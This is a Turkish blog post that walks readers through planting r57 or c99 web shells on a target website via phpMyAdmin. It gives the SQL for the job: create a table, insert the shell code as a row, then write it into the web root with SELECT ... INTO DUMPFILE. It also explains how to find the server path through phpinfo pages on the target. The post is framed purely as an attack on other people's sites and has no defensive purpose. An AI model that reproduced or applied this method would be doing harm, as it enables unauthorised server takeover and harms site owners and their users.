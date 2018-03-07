Bugün PhpMyAdmin üzerin den r57 veya c99 shell,,php,asp gibi shell versiyonlarını nasıl hedef site üzerine enjekte edebiliriz onun üzerinde duracağız. Öncelikle bu yöntemi herkes kolaylıkla yapabilir, PhpMyAdmin SQL ile yapılan basit bir yöntemdir. Eğer yapamayan arkadaşlarımız olursa blog yazısı altın da yorum yaparak, soru veya sorunlarını detaylı anlatırsa yardımcı olmaya çalışırım.

Öncelikle ilk başta phpMyadmin üzerinden r57 shell atmak için, veritabanı oluşturuyoruz. CREATE DATABASE veritabanınınadı, herhangi bir izin yoksa bu durum da databasede yeni bir tablo yaratarak devam ediyoruz.

Tablo oluşturduktan sonra aşağıda ki kodu tabloya ekleyin.

CREATE TABLE veitabanınadi.tabloadi(

Stack NEXT

) TYPE = MYISAM;

INSERT INTO veritabaninadi.tablonunadi

VALUES (

‘r57 shell kodumuz’

);

Tabloda ki kodları dizinden dışarı çıkarmak için ”dumpfile” kodunu kullanıyoruz.

SELECT*

INTO DUMPFILE ‘dizininadi/dosyanınadi.uzantısı’

FROM veritabanınınadi.tablonunadi;

Eğer dizin’i bulmakta zorluk yaşıyorsanız, xxx .com/phpmyadmin/phpinfo.php, xxx .com/phpinfo.php , info.php olarak aratarak dizini bulabilirsiniz,

SCRIPT_FILENAME DOCUMENT_ROOT